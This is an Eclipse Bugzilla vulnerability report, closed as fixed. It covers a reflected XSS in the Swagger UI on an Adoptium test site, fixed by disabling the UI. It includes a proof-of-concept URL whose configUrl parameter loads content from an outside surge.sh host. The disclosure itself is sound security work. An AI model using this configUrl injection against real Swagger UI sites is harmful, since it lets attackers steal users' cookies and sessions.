Bug 580566 - Description: You are using Swagger UI to share API docs, which uses DOMPurify, which is vulnerable to insecure input validation, and overall your domain becomes vulnerable to reflected XSS
Status: CLOSED FIXED
Alias: None
Product: Community
Classification: Eclipse Foundation
Component: Vulnerability Reports
Version: unspecified
Hardware: Other other
Importance: P3 critical
Target Milestone: ---
Assignee: Security vulnerabilities reported against Eclipse projects
QA Contact:
URL:
Whiteboard:
Keywords: security
Depends on:
Blocks:
 
Reported: 2022-08-13 00:08 EDT by Saransh Saraf
Modified: 2022-08-22 03:39 EDT
CC: 12 users

See Also:


Description Saransh Saraf 2022-08-13 00:08:05 EDT
If you don't understand what I am talking about, just forward my email to the CEO/CTO/Security Team.

Hi Team,
I'm Saransh Saraf, a security researcher and bug hunter.
https://www.linkedin.com/in/saransh-saraf-2b514b20b/

I've found a bug in your website; here is the detailed report:
Vulnerable Domain: trss.adoptium.net
Vulnerability Name: Reflected cross-site scripting


Vulnerable URL: https://trss.adoptium.net/api-docs/?configUrl=https://jumpy-floor.surge.sh/test.json

Impact: The attacker will steal users' cookies to log in as them, do phishing on behalf of the domain, and also spread malware and viruses.

If you think my efforts are worth something please reward me with a bounty :)

I'm looking forward to hearing from you.
Regards
Saransh Saraf
Comment 1 Mikaël Barbero 2022-08-16 05:42:38 EDT
cc'ing Adoptium committers.
Comment 2 Shelley Lambert 2022-08-16 09:48:04 EDT
Can we add lan.xia@ca.ibm.com to have visibility of this issue? She will be addressing this (either by updating the module, or removing the Swagger UI as a resolution).
Comment 3 Mikaël Barbero 2022-08-16 09:50:11 EDT
(In reply to Shelley Lambert from comment #2)
> Can we add lan.xia@ca.ibm.com to have visibility of this issue?  She will be
> addressing this (either by updating the module, or removing the swagger UI
> as a resolution).

lan.xia@ca.ibm.com is not associated with any Eclipse account, so I cannot cc her. She will need to create an eclipse account first https://accounts.eclipse.org/user/register?destination=user
Comment 4 Shelley Lambert 2022-08-16 10:07:47 EDT
https://projects.eclipse.org/content/lan-xia-committer-eclipse-aqavit

Not sure what email is associated with that Eclipse account, but if you can, please add her.
Comment 5 Mikaël Barbero 2022-08-16 10:09:04 EDT
lan_xia@ca.ibm.com ;)
Comment 6 Lan Xia 2022-08-17 23:03:35 EDT
I disabled the Swagger UI.
Comment 7 Saransh Saraf 2022-08-17 23:19:03 EDT
Hi, thanks for fixing this vulnerability. Am I now eligible for some bounty or appreciation letter?
Comment 8 Mikaël Barbero 2022-08-22 03:39:41 EDT
Thanks Lan.

Saraf, thanks for your report. I'm afraid we don't offer a bounty or an appreciation letter.